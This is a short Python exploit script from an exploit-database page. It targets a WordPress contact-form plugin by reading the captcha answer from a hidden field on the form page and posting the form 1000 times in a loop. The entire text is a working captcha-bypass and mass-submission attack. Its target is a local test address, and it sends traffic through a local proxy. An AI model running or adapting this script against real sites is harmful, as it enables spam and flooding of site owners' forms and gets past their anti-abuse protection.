## https://sploitus.com/exploit?id=WPEX-ID:A5C97809-2FFC-4EFB-8C80-1B734361CD06
import requests
from requests_html import HTMLSession
from bs4 import BeautifulSoup
#usage: python3 captcher.py
#this is the url of a WP page that has implemented the form of the plugin.
url = "http://192.168.1.5/index.php/just-some-test-dude/"
proxies = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}
#This functions extracts the value of the captcha challenge by providing the id
def extract_value(response, id):
soup = BeautifulSoup(response, 'html.parser')
tag = soup.find('input', attrs={'id': id})
extracted = tag.get('value')
return extracted
for i in range(1, 1001):
s = requests.Session()
first = s.get(url, proxies=proxies)
captcha = extract_value(first.text, 'vscf_captcha_hidden_one')
nonce = extract_value(first.text, 'vscf_nonce')
data_post = {'vscf_name':'AAA',
'vscf_email':"aaaaaa@aa.com",
'vscf_subject': 'aaaaa',
'vscf_captcha': captcha,
'vscf_captcha_hidden_one': captcha,
'vscf_captcha_hidden_two':'0',
'vscf_firstname': '',
'vscf_lastname':'',
'vscf_message': 'ssssssssssssssssssssssssssssssssssssssssssss',
'vscf_nonce': nonce, #80abc23916
'_wp_http_referer':'%2Findex.php%2Fjust-some-test-dude%2F',
'vscf_send': ''}
submit = s.post(url, data=data_post, proxies=proxies)